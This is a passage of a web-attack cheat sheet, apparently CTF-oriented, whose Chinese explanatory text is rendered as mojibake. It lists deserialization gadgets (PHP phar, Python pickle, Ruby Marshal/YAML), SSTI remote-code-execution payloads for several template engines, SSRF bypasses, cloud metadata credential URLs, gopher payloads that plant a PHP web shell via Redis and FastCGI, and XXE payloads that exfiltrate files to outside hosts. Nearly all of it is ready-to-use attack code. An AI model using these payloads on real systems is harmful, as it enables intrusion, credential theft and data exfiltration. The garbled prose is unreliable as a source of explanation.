- ç©ä»¶å±¬æ§åæ¸å¤§æ¼çæ£ç屬æ§åæ¸ï¼æç¥é
__wakeupçå·è¡ - ååºååæ失æï¼ä½æ¯
__destructæå·è¡ - HITCON 2016
- å½±é¿çæ¬ï¼
-
å°ç¹æ§
O:+4:"test":1:{s:1:"a";s:3:"aaa";}O:4:"test":1:{s:1:"a";s:3:"aaa";}- å ©è çµæç¸å
-
Fast Destruct
- å¼·è¿«ç©ä»¶è¢« Destruct
- æç©ä»¶æ¾é² Arrayï¼ä¸¦ç¨ç¸åç key èæéåç©ä»¶ï¼å³å¯å¼·è¿«å¼å«
__destruct()Array('key1' => classA, 'key1' => classB)
- https://github.com/ambionics/phpggc#fast-destruct
- Example
-
ASCII Strings
- 使ç¨
Sçåºååæ ¼å¼ï¼åå¯ä»¥å°åä¸²å §å®¹æ¹ç¨ hex 表示s:5:"A<null_byte>B<cr><lf>";Ì=>S:5:"A\00B\09\0D";- ç¹ WAF
- https://github.com/ambionics/phpggc#ascii-strings
- Example
- Balsn CTF 2020 - L5D
- ç½é¼æ¯2020 éé¾ç» - AreUSerialz
- 使ç¨
-
Phar:// ååºåå
-
phar æ件æå°ä½¿ç¨è èªå®ç¾©ç metadata 以åºååå½¢å¼ä¿å
-
éé
phar://å½åè°å¯ä»¥éå°ååºååçææ -
常è¦å½±é¿å½æ¸:
file_get_contents(),file_exists(),is_dir(), ... -
éé phar 觸ç¼ååºååæï¼æªåéè¦æå¯æªå(ä»»æå¯æªåé½è¡)
-
Payload generator
<?php class TestObject { } @unlink("phar.phar"); $phar = new Phar("phar.phar"); $phar->startBuffering(); $phar->setStub("<?php __HALT_COMPILER(); ?>"); $o = new TestObject(); $phar->setMetadata($o); $phar->addFromString("test.txt", "test"); $phar->stopBuffering(); ?> -
php èå¥ phar æ¯éé
__HALT_COMPILER();?>- å¯ä»¥å¨éé stub å¡æ±è¥¿
- e.g. å½é GIF é :
$phar->setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
-
trigger phar deserialization by zip
<?php class FLAG{} $obj=serialize(new FLAG()); $zip = new ZipArchive; $res = $zip->open('test.zip', ZipArchive::CREATE); $zip->addFromString('test.txt', 'meow'); $zip->setArchiveComment($obj); $zip->close(); // trigger: phar://test.zip -
trigger phar deserialization by tar
<?php //@unlink("trigger.tar"); class FLAG{} $phar = new PharData("trigger.tar"); $phar["kaibro"] = "meow"; $obj = new FLAG(); $phar->setMetadata($obj); // trigger: phar://trigger.tar -
Generic Gadget Chains
-
bypass phar:// ä¸è½åºç¾å¨éé
compress.zlib://,compress.bzip2://, ...compress.zlib://phar://meow.phar/test.txtphp://filter/read=convert.base64-encode/resource=phar://meow.phar
-
Example
-
Python Pickle
dumps()å°ç©ä»¶åºååæå串loads()å°å串ååºåå
Example:
a.py:
import os
import cPickle
import sys
import base64
class Exploit(object):
def __reduce__(self):
return (os.system, ('id',))
shellcode = cPickle.dumps(Exploit())
print base64.b64encode(shellcode)
b.py:
import os
import cPickle
import sys
import base64
s = raw_input(":")
print cPickle.loads(base64.b64decode(s))
$ python a.py > tmp
$ cat tmp | python b.py
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),110(lxd)
- è£å
: NumPy CVE-2019-6446 RCE
- å½±é¿ NumPy <=1.16.0
- åºå±¤ä½¿ç¨ pickle
Ruby/Rails Deserialization
BAh: Marshal serialized data ç base64 編碼ç¹å¾µsecret_key_base- ç¨æ¼
ActiveSupport::MessageVerifier/ActiveSupport::MessageEncryptor- sign & encrypt cookies
- ActiveStorage ååºåå
- Rails 5.2 å¾ï¼å¯éé
credentials.yml.encåmaster.keyéå
- ç¨æ¼
Gadget chain
- Ruby 3.4 Universal RCE Deserialization Gadget Chain by Luke Jahnke (2024)
- Execute commands by sending JSON? Learn how unsafe deserialization vulnerabilities work in Ruby projects by Peter Stöckli (2024)
- Discovering Deserialization Gadget Chains in Rubyland by Alex Leahu (2024)
- Ruby Deserialization - Gadget on Rails by httpvoid (2022)
- Universal gadget for ruby 2.x-3.x by vakzz (2021)
- Universal RCE with Ruby YAML.load (versions > 2.7) by Etienne Stalmans (2021)
- PBCTF 2020 - R0bynotes (2020)
- ERB ç¡æ³ç¨ï¼æ¹ç¨
ActiveModel::AttributeMethods::ClassMethods::CodeGenerator
- ERB ç¡æ³ç¨ï¼æ¹ç¨
- Universal gadget for ruby 2.x by elttam (2018)
- ERB gadget chain
Ruby Marshal
this one is not self-executing
this one actually relies on rails invoking a method on the resulting object after the deserialization
erb = ERB.allocate
erb.instance_variable_set :@src, "`id`"
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result, "foo", ActiveSupport::Deprecation
hash = {depr => 'something'}
marshalled = Marshal.dump(hash)
print marshalled
å¨ ERB ä¸ï¼ç¶ result æ run method 被 call æï¼@src ç string æ被å·è¡
-
常è¦ä½¿ç¨æ å¢ï¼
- 以 Marshal çº Cookie Serializer æï¼è¥æ
secret_keyï¼åå¯ä»¥å½é Cookie - ä¹å¯ä»¥éé
DeprecatedInstanceVariableProxyå»å·è¡ ERB çresultä¾ RCE- ç¶
DeprecatedInstanceVariableProxy被 unmarshalï¼rails session å°ä»èçæéå°ä¸èªèç method å°±æå¼å«method_missingï¼å°è´å·è¡å³å ¥ç ERB @instance.__send__(@method)
- ç¶
- 以 Marshal çº Cookie Serializer æï¼è¥æ
-
Cookie Serializer
- Rails 4.1 以åç Cookie Serializer çº Marshal
- Rails 4.1 éå§ï¼é»èªä½¿ç¨ JSON
Ruby/Rails YAML
- CVE-2013-0156
- èçæ¬ç Rails ä¸ï¼
XMLç node å¯ä»¥èªè¨ typeï¼å¦ææå®çºyamlï¼æ¯æ被æå解æç - è¥ååºåå
!ruby/hashï¼åç¸ç¶æ¼å¨ç©ä»¶ä¸èª¿ç¨obj[key]=valï¼ä¹å°±æ¯[]=æ¹æ³ - èéå
ActionDispatch::Routing::RouteSet::NamedRouteCollectionä¸ç[]=æ¹æ³ä¸ï¼æä¸æ¢ä»£ç¢¼è·¯å¾å¯ä»¥ eval define_hash_accessä¸å¯ä»¥çå°module_evalï¼è£é çselectorä¾èªname- å çºä»éæå°
value調ç¨defaultsmethodï¼æ以å¯ä»¥å©ç¨OpenStructä¾æ§éå½æ¸å=>è¿åå¼çå°æéä¿åæ¾å¨@tableä¸
- Payload:
xml = %{ <?xml version="1.0" encoding="UTF-8"?> <bingo type='yaml'> ---| !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection 'test; sleep(10); test' : !ruby/object:OpenStruct table: :defaults: {} </bingo> }.strip - èçæ¬ç Rails ä¸ï¼
- CVE-2013-0333
- Rails 2.3.x å 3.0.x ä¸ï¼å
許
text/jsonç request è½æYAML解æ Yamlå¨ Rails 3.0.x æ¯é è¨çJSON Backend- åºåé¡çå°æ¹å¨æ¼
YAML.loadåçconvert_json_to_yamlï¼ä»ä¸æ檢æ¥è¼¸å ¥ç JSON æ¯å¦åæ³ - ä¸æ¨£å¯ä»¥éé
ActionController::Routing::RouteSet::NamedRouteCollection#define_hash_accessçmodule_evalä¾ RCE
- Rails 2.3.x å 3.0.x ä¸ï¼å
許
Java Deserialization
- åºååè³æç¹å¾µ
ac ed 00 05 ...rO0AB ...(Base64)
- ååºåå觸ç¼é»
readObject()readExternal()- ...
- JEP290
- Java 9 æ°ç¹æ§ï¼ä¸¦åä¸æ¯æ´å° 8u121, 7u13, 6u141
- å¢å é»ãç½åå®æ©å¶
- Builtin Filter
- JDK å å«äº Builtin Filter (ç½åå®æ©å¶) å¨ RMI Registry å RMI Distributed Garbage Collector
- åªå 許ç¹å® class 被ååºåå
- è¨±å¤ RMI Payload 失æ (å³ä¾¿ classpath æ gadegt)
- Codebase
- JDK 6u45, 7u21 éå§ï¼
useCodebaseOnlyé è¨çº true- ç¦æ¢èªåè¼å ¥é 端 class æ件
- JNDI Injection
- JDK 6u132, 7u122, 8u113 ä¸ï¼
com.sun.jndi.rmi.object.trustURLCodebase,com.sun.jndi.cosnaming.object.trustURLCodebaseé è¨çº false- RMI é è¨ä¸å 許å¾é 端 Codebase è¼å ¥ Reference class
- JDK 11.0.1, 8u191, 7u201, 6u211 å¾ï¼
com.sun.jndi.ldap.object.trustURLCodebaseé è¨çº false- LDAP é è¨ä¸å 許å¾é 端 Codebase è¼å ¥ Reference class
- é«çæ¬JDK (8u191+)
- codebase ç¡æ³å©ç¨ (trustURLCodebase=false)
- å¯è½æ»æè·¯å¾
-
- æ¾å¯å©ç¨ç ObjectFactory
- e.g. Tomcat ä¸å¯å©ç¨
org.apache.naming.factory.BeanFactory+javax.el.ELProcessor
-
- éé
javaSerializedDataé²è¡ååºåå
- éé
-
- JDK 6u132, 7u122, 8u113 ä¸ï¼
- JDK 6u45, 7u21 éå§ï¼
- Tool
- yososerial
- URLDNS: ä¸ä¾è³´ä»»ä½é¡å¤libraryï¼å¯ä»¥ç¨ä¾å dnslog é©è
- CommonCollections 1~7: Common collections åçæ¬ gadget chain
- ...
- BaRMIe
- å°æ Java RMI (enumerating, attacking)
- remote-method-guesser
- RMI vulnerability scanner
- marshalsec
- SerializationDumper
- åæ Serialization Streamï¼å¦ Magic é ãserialVersionUIDãnewHandle ç
- gadgetinspector
- Bytecode Analyzer
- æ¾ gadget chain
- GadgetProbe
- ééåå ¸æªé å DNS callbackï¼å¤æ·ç°å¢ä½¿ç¨åªäº library, class çè³è¨
- JNDI-Injection-Bypass
- yososerial
- Java-Deserialization-Cheat-Sheet
- Example
- 0CTF 2022 - hessian-onlyjdk
- hessian2 ååºåå
- 0CTF 2022 - 3rm1
- Balsn CTF 2021 - 4pple Music
- 0CTF 2021 Qual - 2rm1
- 0CTF 2019 Final - hotel booking system
- TrendMicro CTF 2018 Qual - Forensics 300
- TrendMicro CTF 2019 Qual - Forensics 300
- TrendMicro CTF 2019 Final - RMIart
- 0CTF 2022 - hessian-onlyjdk
.NET Derserialization
- Tool
- asp.net ä¸ ViewState 以åºååå½¢å¼ä¿åè³æ
- æ machinekey æ viewstate æªå å¯/é©èæï¼ææ©æ RCE
- Example
SSTI
Server-Side Template Injection
Testing
{{ 7*'7' }}- Twig:
49 - Jinja2:
7777777
- Twig:
<%= 7*7 %>- Ruby ERB:
49
- Ruby ERB:
Flask/Jinja2
-
Dump all used classes
{{ ''.__class__.__mro__[2].__subclasses__() }}
-
Read File
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
-
Write File
{{''.__class__.__mro__[2].__subclasses__()[40]('/var/www/app/a.txt', 'w').write('Kaibro Yo!')}}
-
RCE
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}- evil config
{{ config.from_pyfile('/tmp/evilconfig.cfg') }}- load config
{{ config['RUNCMD']('cat flag',shell=True) }}
-
RCE (another way)
{{''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('ls').read()}}
-
Python3 RCE
-
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("os").popen("id").read()') }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %}
-
-
é濾ä¸æ¬è
__getitem__{{''.__class__.__mro__.__getitem__(2)}}{{''.__class__.__mro__[2]}}
-
é濾
{{or}}- ç¨
{%%} - å·è¡çµæå¾å¤å³
- ç¨
-
é濾
.{{''.__class__}}{{''['__class__']}}{{''|attr('__class__')}}
-
é濾Keyword
- ç¨
\xffå½¢å¼å»ç¹ {{''["\x5f\x5fclass\x5f\x5f"]}}
- ç¨
-
ç¨requestç¹
{{''.__class__}}{{''[request.args.kaibro]}}&kaibro=__class__
Twig / Symfony
- RCE
{{['id']|map('passthru')}}{{['id']|filter('system')}}{{app.request.query.filter(0,'curl${IFS}kaibro.tw',1024,{'options':'system'})}}{{_self.env.setCache("ftp://attacker.net:21")}}{{_self.env.loadTemplate("backdoor")}}{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
- Read file
{{'/etc/passwd'|file_excerpt(30)}}
- Version
{{constant('Twig\\Environment::VERSION')}}
thymeleaf
- Java
- 常è¦æ³¨å ¥æ å¢: https://github.com/veracode-research/spring-view-manipulation/
- Some payload
__${T(java.lang.Runtime).getRuntime().availableProcessors()}__::..x__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x__*{new.java.lang.String(new.java.lang.ProcessBuilder('ls', '-al').start().getInputStream().readAllBytes())}__::.
- é«çæ¬éå¶
- Example
- WCTF 2020 - thymeleaf
- DDCTF 2020 - Easy Web
- Codegate 2023 - AI
- from Pew:
$__|{springRequestContext.getClass().forName("org.yaml.snakeyaml.Yaml").newInstance().load(thymeleafRequestContext.httpServletRequest.getParameter("a"))}|__(xx=id)?a=!!org.springframework.context.support.FileSystemXmlApplicationContext ["https://thegrandpewd.pythonanywhere.com/pwn.bean"]
- from Pew:
- DEVCORE Wargame 2024 - Spring
- thymeleaf 3.0.15:
__*{new.java.lang.String(new.java.lang.ProcessBuilder('/readflag', 'give','me','the','flag').start().getInputStream().readAllBytes())}__::.
- thymeleaf 3.0.15:
Freemarker
${"freemarker.template.utility.Execute"?new()("calc")}${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}<#assign value="freemarker.template.utility.Execute"?new()>${value("Calc")}<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","Calc").start()}
Golang
- module
- Testing
{{87}}{{.}}{{"meow"|print}}{{"<script>alert(/xss/)</script>"}}{{ .MyFunc "arg1" "arg2" }}- éä¸ä¸ææå®ç¾©
MyFuncå½æ¸
- éä¸ä¸ææå®ç¾©
- ...
- Echo gadget
{{.File "/etc/passwd"}}{{.Echo.Filesystem.Open "/etc/passwd"}}{{.Echo.Static "/meow" "/"}}- Example:
- ACSC CTF 2023 - easyssti
{{ $x := .Echo.Filesystem.Open "/flag" }} {{ $x.Seek 1 0 }} {{ .Stream 200 "text/plain" $x }}(by @nyancat){{ (.Echo.Filesystem.Open "/flag").Read (.Get "template") }} {{ .Get "template" }}(by @maple3142){{ $f := .Echo.Filesystem.Open "/flag" }} {{ $buf := .Get "template" }} {{ $f.Read $buf }} {{ $buf }(by @Ocean)
- ACSC CTF 2023 - easyssti
AngularJS
- v1.6 å¾ç§»é¤ Sandbox
- Payload
{{ 7*7 }}=> 49{{ this }}{{ this.toString() }}{{ constructor.toString() }}{{ constructor.constructor('alert(1)')() }}2.1 v1.0.1-v1.1.5{{ a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')() }}2.1 v1.0.1-v1.1.5{{ toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor) }}2.3 v1.2.19-v1.2.23{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}v1.2.24-v1.2.29{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}v1.3.20{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}v1.4.0-v1.4.9{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}v1.5.0-v1.5.8{{ [].pop.constructor('alert(1)')() }}2.8 v1.6.0-1.6.6
Vue.js
{{constructor.constructor('alert(1)')()}}- https://github.com/dotboris/vuejs-serverside-template-xss
Python
%- 輸å
¥
%(passowrd)så³å¯å·å°å¯ç¢¼ï¼
userdata = {"user" : "kaibro", "password" : "ggininder" } passwd = raw_input("Password: ") if passwd != userdata["password"]: print ("Password " + passwd + " is wrong for user %(user)s") % userdata- 輸å
¥
f- python 3.6
- example
a="gg"b=f"{a} ininder">>> gg ininder
- example2
f"{os.system('ls')}"
Tool
http://blog.portswigger.net/2015/08/server-side-template-injection.html
SSRF
Find SSRF
-
Webhook
- Exmaple: https://hackerone.com/reports/56828
-
From XXE to SSRF
<!ENTITY xxe SYSTEM "http://192.168.1.1/secret">
-
PDF generator / HTML renderer
- æ JS, Iframe, ...
- e.g.
<iframe src="file:///C:/Windows/System32/drivers/etc/hosts>
-
Open Graph
<meta property="og:image" content="http://kaibro.tw/ssrf">
-
SQL Injection
- e.g. Oracle:
?id=1 union select 1,2,UTL_HTTP.request('http://10.0.0.1/secret') from dual
- e.g. Oracle:
-
SVG parsing
- xlink:
<?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><image height="200" width="200" xlink:href="http://<EXAMPLE_SERVER>/image.jpeg" /></svg> - More payload: https://github.com/cujanovic/SSRF-Testing/tree/master/svg
- Bug Bounty Example: https://hackerone.com/reports/223203
- xlink:
-
ImageTragick
- CVE-2016-3718
push graphic-context viewbox 0 0 640 480 fill 'url(http://example.com/)' pop graphic-context -
HTTPoxy
- CGI èªåå° header
Proxyä»£å ¥æç°å¢è®æ¸HTTP_Proxy Proxy: http://evil.com:12345/
- CGI èªåå° header
-
XSLT
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:include href="http://127.0.0.1:8000/xslt"/>
<xsl:template match="/">
</xsl:template>
</xsl:stylesheet>
- FFMPEG
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://yourserver.com/anything
#EXT-X-ENDLIST
Bypass 127.0.0.1
127.0.0.1
127.00000.00000.0001
localhost
127.0.1
127.1
0.0.0.0
0.0
0
::1
::127.0.0.1
::ffff:127.0.0.1
::1%1
127.12.34.56 (127.0.0.1/8)
127.0.0.1.xip.io
http://2130706433 (decimal)
http://0x7f000001
http://017700000001
http://0x7f.0x0.0x0.0x1
http://0177.0.0.1
http://0177.01.01.01
http://0x7f.1
http://[::]
Bypass using ⶠⷠ⸠â¹
http://ââ¶â¾â·ââ.ââhttp://ââ§âââââ.âââ
å §ç¶²IP
10.0.0.0/8172.16.0.0/12192.168.0.0/16
XSPA
- port scan
127.0.0.1:80=> OK127.0.0.1:87=> Timeout127.0.0.1:9487=> Timeout
302 Redirect Bypass
- ç¨ä¾ç¹é protocol éå¶
- 第ä¸æ¬¡ SSRFï¼ç¶²ç«æå檢æ¥ãé濾
- 302 è·³è½å第äºæ¬¡ SSRF æ²æ檢æ¥
æ¬å°å©ç¨
-
file protocol
file:///etc/passwdfile:///proc/self/cmdline- çä»å¨è·å¥
file:///proc/self/exe- dump binary
file:///proc/self/environ- è®ç°å¢è®æ¸
curl file://google.com/etc/passwd- æ°ç已修æ
- 實測 libcurl 7.47 å¯work
- Java åçå¯åç®é (
netdoc亦å¯) - Perl/Ruby open Command Injection
-
Libreoffice CVE-2018-6871
- å¯ä»¥ä½¿ç¨
WEBSERVICEè®æ¬å°æªæ¡ï¼e.g./etc/passwd - è®åºä¾å¯ä»¥ç¨ http å¾å¤å³
=COM.MICROSOFT.WEBSERVICE("http://kaibro.tw/"&COM.MICROSOFT.WEBSERVICE("/etc/passwd"))- e.g. DCTF 2018 final, FBCTF 2019
- Example Payload: Link
- å¯ä»¥ä½¿ç¨
é ç¨å©ç¨
- Gopher
- å¯å½é ä»»æ TCPï¼hen è
gopher://127.0.0.1:5278/xGG%0d%0aININDER
- 常è¦ä¾å
-
Struts2
- S2-016
action:ãredirect:ãredirectAction:index.do?redirect:${new java.lang.ProcessBuilder('id').start()}
- S2-016
-
ElasticSearch
- default port:
9200
- default port:
-
Redis
- default port:
6379 - ç¨ SAVE 寫 shell
FLUSHALL SET myshell "<?php system($_GET['cmd']) ?>" CONFIG SET DIR /www CONFIG SET DBFILENAME shell.php SAVE QUIT- URLencoded payload:
gopher://127.0.0.1:6379/_FLUSHALL%0D%0ASET%20myshell%20%22%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%3F%3E%22%0D%0ACONFIG%20SET%20DIR%20%2fwww%2f%0D%0ACONFIG%20SET%20DBFILENAME%20shell.php%0D%0ASAVE%0D%0AQUIT
- default port:
-
FastCGI
- default port: 9000
- example
- Discuz Pwn
- 302.php:
<?php header( "Location: gopher://127.0.0.1:9000/x%01%01Zh%00%08%00%00%00%01%00%00%00%00%00%00%01%04Zh%00%8b%00%00%0E%03REQUEST_METHODGET%0F%0FSCRIPT_FILENAME/www//index.php%0F%16PHP_ADMIN_VALUEallow_url_include%20=%20On%09%26PHP_VALUEauto_prepend_file%20=%20http://kaibro.tw/x%01%04Zh%00%00%00%00%01%05Zh%00%00%00%00" ); - x:
<?php system($_GET['cmd']); ?> - visit:
/forum.php?mod=ajax&action=downremoteimg&message=[img]http://kaibro.tw/302.php?.jpg[/img]
- 302.php:
- Discuz Pwn
-
MySQL
- ç¡å¯ç¢¼èªèå¯ä»¥ SSRF
- MySQL Client è Server 交äºä¸»è¦åå
©é段
- Connection Phase
- Command Phase
gopher://127.0.0.1:3306/_<PAYLOAD>- Tool: https://github.com/undefinedd/extract0r-
-
MSSQL
-
Tomcat
- éé tomcat manager é¨ç½² war
- è¦å
æ帳å¯ï¼å¯ä»¥å¾
tomcat-users.xmlè®ï¼ææ¯è¸¹é è¨å¯ç¢¼ - Tool: https://github.com/pimps/gopher-tomcat-deployer
- e.g. CTFZone 2019 qual - Catcontrol
-
Docker
- Remote api æªææ¬è¨ªå
- éä¸å containerï¼æè¼ /root/ï¼å¯« ssh key
- 寫 crontabå½ shell
docker -H tcp://ip xxxx
- Remote api æªææ¬è¨ªå
-
ImageMagick - CVE-2016-3718
- å¯ä»¥ç¼é HTTP æ FTP request
- payload: ssrf.mvg
push graphic-context viewbox 0 0 640 480 fill 'url(http://example.com/)' pop graphic-context$ convert ssrf.mvg out.png
-
Metadata
AWS
- http://169.254.169.254/latest/user-data
- http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
- http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
- http://169.254.169.254/latest/meta-data/ami-id
- http://169.254.169.254/latest/meta-data/reservation-id
- http://169.254.169.254/latest/meta-data/hostname
- http://169.254.169.254/latest/meta-data/public-keys/
- http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
- http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
Google Cloud
- http://metadata.google.internal/computeMetadata/v1/
- http://metadata.google.internal/computeMetadata/v1beta1/
- è«æ±ä¸ç¨å ä¸ header
- http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
- Access Token
- Check the scope of access token:
curl "https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=XXXXXXXXXXXXXXXXXXX" - Call the Google api with token:
curl "https://www.googleapis.com/storage/v1/b?project=<your_project_id>" -H "Authorization: Bearer ya29..."(list buckets)
- http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json
- SSH public key
- http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json
- kub-env
- http://metadata.google.internal/computeMetadata/v1beta1/project/project-id
- http://metadata.google.internal/computeMetadata/v1beta1/instance/name
- http://metadata.google.internal/computeMetadata/v1beta1/instance/hostname
- http://metadata.google.internal/computeMetadata/v1beta1/instance/zone
Digital Ocean
- http://169.254.169.254/metadata/v1.json
- http://169.254.169.254/metadata/v1/
- http://169.254.169.254/metadata/v1/id
- http://169.254.169.254/metadata/v1/user-data
- http://169.254.169.254/metadata/v1/hostname
- http://169.254.169.254/metadata/v1/region
- http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
Azure
- http://169.254.169.254/metadata/v1/maintenance
- http://169.254.169.254/metadata/instance?api-version=2020-06-01
- éè¦å ä¸
Metadata: trueheader
- éè¦å ä¸
Alibaba
- http://100.100.100.200/latest/meta-data/
- http://100.100.100.200/latest/meta-data/instance-id
- http://100.100.100.200/latest/meta-data/image-id
CRLF injection
SMTP
SECCON 2017 SqlSRF:
127.0.0.1 %0D%0AHELO sqlsrf.pwn.seccon.jp%0D%0AMAIL FROM%3A %3Ckaibrotw%40gmail.com%3E%0D%0ARCPT TO%3A %3Croot%40localhost%3E%0D%0ADATA%0D%0ASubject%3A give me flag%0D%0Agive me flag%0D%0A.%0D%0AQUIT%0D%0A:25/
FingerPrint
- dict
dict://evil.com:5566
$ nc -vl 5566
Listening on [0.0.0.0] (family 0, port 5278)
Connection from [x.x.x.x] port 5566 [tcp/*] accepted (family 2, sport 40790)
CLIENT libcurl 7.35.0
-> libcurl version
- sftp
sftp://evil.com:5566
$ nc -vl 5566
Listening on [0.0.0.0] (family 0, port 5278)
Connection from [x.x.x.x] port 5278 [tcp/*] accepted (family 2, sport 40810)
SSH-2.0-libssh2_1.4.2
-> ssh version
- Content-Length
- éè¶ å¤§ Content-length
- é£ç· hang ä½å¤æ·æ¯å¦çº HTTP Service
UDP
- tftp
tftp://evil.com:5566/TEST- syslog
SSRF Bible:
https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit
Testing Payload:
https://github.com/cujanovic/SSRF-Testing
XXE
å §é¨å¯¦é«
<!DOCTYPE kaibro[
<!ENTITY param "hello">
]>
<root>¶m;</root>
å¤é¨å¯¦é«
libxml2.9.0以å¾ï¼é è¨ä¸è§£æå¤é¨å¯¦é«simplexml_load_file()èçæ¬ä¸é è¨è§£æ實é«ï¼ä½æ°çè¦æå®ç¬¬ä¸ååæ¸LIBXML_NOENTSimpleXMLElementis a class in PHP
<!DOCTYPE kaibro[
<!ENTITY xxe SYSTEM "http://kaibro.tw/xxe.txt">
]>
<root>&xxe;</root>
<!DOCTYPE kaibro[
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
XXE on Windows
<!DOCTYPE kaibro[
<!ENTITY xxe SYSTEM "\\12.34.56.78">
]>
<root>&xxe;</root>
åæ¸å¯¦é«
<!DOCTYPE kaibro[
<!ENTITY % remote SYSTEM "http://kaibro.tw/xxe.dtd">
%remote;
]>
<root>&b;</root>
xxe.dtd: <!ENTITY b SYSTEM "file:///etc/passwd">
Out of Band (OOB) XXE
- Blind ç¡å顯
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/xxe/test.php">
<!ENTITY % remote SYSTEM "http://kaibro.tw/xxe.dtd">
%remote;
%all;
%send;
]>
xxe.dtd:
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://kaibro.tw/?a=%file;'>">
CDATA
æç¹æ®åå å¡é² CDATA 解決ç¡æ³è®ååé¡
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://kaibro.tw/cdata.dtd">
%dtd;
%all;
]>
<root>&f;</root>
cdata.dtd:
<!ENTITY % file SYSTEM "file:///var/www/html/flag.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY f '%start;%file;%end;'>">
DoS
- Billion Laugh Attack
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>
串Pharååºåå
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [
<!ENTITY xxe SYSTEM "phar:///var/www/html/images/gginin/xxxx.jpeg" > ]>
<svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-family="Verdana" font-size="16" x="10" y="40">&xxe;</text>
</svg>
- Example: MidnightSun CTF - Rubenscube
Error-based XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message[
<!ELEMENT message ANY >
<!ENTITY % NUMBER '<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%NUMBER;
]>
<message>a</message>
- Example: Google CTF 2019 Qual - bnv
Java XXE + FTP
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE ANY [
<!ENTITY % dtd PUBLIC "-//OXML/XXE/EN" "http://127.0.0.1:8080/ftp.dtd">
%dtd;%ftp;%send;
]>
<ANY>xxe</ANY>
ftp.dtd:
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % ftp "<!ENTITY % send SYSTEM 'ftp://fakeuser:%file;@127.0.0.1:2121'>">
or
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % ftp "<!ENTITY % send SYSTEM 'ftp://fakeuser:pass@127.0.0.1:2121/%file;'>">
æ£å¸¸ OOB XXE éå°æªæ¡å
§å®¹æ \n æç
ä½ Java ç°å¢ä¸ï¼é¨åçæ¬éé FTP ä¸æ被影é¿:
